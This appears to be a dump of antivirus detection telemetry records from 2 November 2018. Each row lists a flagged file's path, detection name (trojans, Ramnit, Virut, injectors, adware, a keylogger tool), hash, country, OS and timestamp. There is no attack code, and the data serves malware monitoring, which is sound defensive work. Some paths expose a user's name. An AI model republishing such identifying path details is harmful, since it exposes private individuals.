  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T12:49:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:08:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155758-e000100e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155758-E000100E', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:58:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7121431\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:07:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='adorage.dll', filepath='C:\\Program Files\\CyberLink\\Shared files\\Plugin\\proDAD\\adorage.dll', filesize=1920000, name='W32/Ramnit.CD.#M1.#R1'), hash='0f1aadc40295db58302849cfe1f06bbee568c045c4997fa7ac177fd19f928106', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T02:38:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T00:25:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:49:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='421da9944c582ee98ea55430b0df32d2f3b6ef2f2e8ecc23db4f368491b0af16', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\421DA9944C582EE98EA55430B0DF32D2F3B6EF2F2E8ECC23DB4F368491B0AF16', filesize=1280000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='421da9944c582ee98ea55430b0df32d2f3b6ef2f2e8ecc23db4f368491b0af16', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:24:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T06:08:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='obrazetc-uchetnaya-politika-na-2015-god-rb.exe', filepath='C:\\Documents and Settings\\X\\Мои документы\\Загрузки\\obrazetc-uchetnaya-politika-na-2015-god-rb.exe', filesize=2528000, name='HEUR/AGEN.1006515.#M1.#R1'), hash='0c1d41d006d24eedea4d3a0819b3d69bbcb42c603142bc355fb6d9e1302807a4', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-164559-b45bd139', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_16b8ee34\\AVSCAN-20181102-164512-AF84940C\\AVSCAN-20181102-164559-B45BD139', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:46:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-084626-7f356f9a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0ac08dd3\\AVSCAN-20181102-084616-7D9E47AA\\AVSCAN-20181102-084626-7F356F9A', filesize=232000, name='HEUR/AGEN.1031614.#M1.#R1'), hash='0cdcb40b28416b55bd01d4cc98e457174bfa8fdde5f50bacbf3c60aa116b056b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:46:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-140457-b6fca73d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-140211-A771A7C2\\AVSCAN-20181102-140457-B6FCA73D', filesize=1088000, name='EXP/Excel.Exploit.Gen.#M1.#R1'), hash='46fca5e52395ecf0f3467a783e0bffb96a30de97377a885a87b67b367c7c014a', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:05:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wd apps setup.exe', filepath='E:\\My Passport Apps for Mac\\WD Apps Setup.exe', filesize=4224000, name='TR/Patched.Gen.#M300.#R3374'), hash='3727f3a489289c1fcc6a1edb90f2af0c1f512f17825053200ba88f9ceedfefcc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T18:59:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='e:\\users\\X\\desktop\\megared gml\\windows\\system32\\dllcache\\wmplayer.exe', filesize=64000, name='TR/Dropper.Gen8.#M300.#R700255'), hash='1dec67dc23c158887f03ec5ec57b9555c9fa7a898da120e732d1cc86534bf15e', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:18:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:24:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-162903-d29d3cb3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b25ab4e\\AVSCAN-20181102-162834-CD9A72A7\\AVSCAN-20181102-162903-D29D3CB3', filesize=2288000, name='PUA/InstallCore.Gen.#M1.#R1'), hash='348888a26e74093c0f08d368a961257b96b0f5c4533a693746bef050d1b8d0cf', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:29:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0119723.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0119723.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='plugins.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\plugins\\plugins.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17fda011ee2b31abf1cb952720428e6f97c148c7b9caf0e5791049a2cbad76db', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='i2owb436.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Low\\i2owb436.exe', filesize=128000, name='HEUR/AGEN.1031358.#M1.#R1'), hash='05ef2a5ba87cf6744258137434f14566712d632c88c70e00fa161eb1bd5a7de8', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:06:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:01:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-090401-2f086651', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c4c4ad2b\\AVSCAN-20181102-090221-25501C41\\AVSCAN-20181102-090401-2F086651', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:03:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hl.exe', filepath='\\\\?\\D:\\Games\\Counter-Strike Global Offensive 1.0\\hl.exe', filesize=5888000, name='SPR/GameHack.6980e9.#M1.#R1'), hash='6980e96106136eb42b4248e91bea4f08b08c5ec3a21151e9513d02edf45a74ae', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:53:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061042-396fb68a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-061022-36B694EC\\AVSCAN-20181102-061042-396FB68A', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052553-bcdca4b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052553-BCDCA4B3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055656-13603a2a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055656-13603A2A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061210-341d6eea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061210-341D6EEA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055239-7a4e8aef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055239-7A4E8AEF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160849-4e9571df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-160849-4E9571DF', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:11:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-032248-5023fa3e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c01343eb\\AVSCAN-20181102-032233-4D88C1AA\\AVSCAN-20181102-032248-5023FA3E', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:22:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061208-32e145cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061208-32E145CC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-140302-d4457adf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-140302-D4457ADF', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:06:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-02T15:16:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061904-2ae835e0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061904-2AE835E0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00001e7d', filepath='C:\\Windows\\Temp\\tmp0000010e\\tmp00001e7d', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T17:45:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-122003-5997cf83', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_483c7b89\\AVSCAN-20181102-121944-567E3BAB\\AVSCAN-20181102-122003-5997CF83', filesize=64000, name='TR/Kazy.64000.13.#M1.#R1'), hash='63cca7c71b7d914ec4cb900dea1c1de7e17481d8e9a3b1b1e87ca301df283f7e', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:19:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='p008', filepath='/var/spool/vscan/amavis/tmp/amavis-20181101T234003-00693/parts/p008', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T06:52:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055629-02ffbe5d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055629-02FFBE5D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='chekraid.exe', filepath='\\\\?\\C:\\SYSTEM.SAV\\util\\ChekRaid.exe', filesize=192000, name='HEUR/AGEN.1014163.#M1.#R1'), hash='4ad4aa15337e64c3737556187a28f047fe900c106b402e26f4dd0a4edc51c1e4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:12:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-211851-0b2a610f', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-205048-4BC794B4\\AVSCAN-20181102-211851-0B2A610F', filesize=896000, name='ADWARE/CrossRider.Gen2.#M1.#R1'), hash='67d56162c250a09bdb11a194c8afe4787622d5f4e61878015b88747ac29855f5', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:18:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-202455-53973f64', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d43ee73c\\AVSCAN-20181102-201805-1A7B5F93\\AVSCAN-20181102-202455-53973F64', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T19:24:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052141-26f9e9b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052141-26F9E9B6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052258-54b73ad2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052258-54B73AD2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:57Z'), dt=datetime.date(2018, 11, 2)),
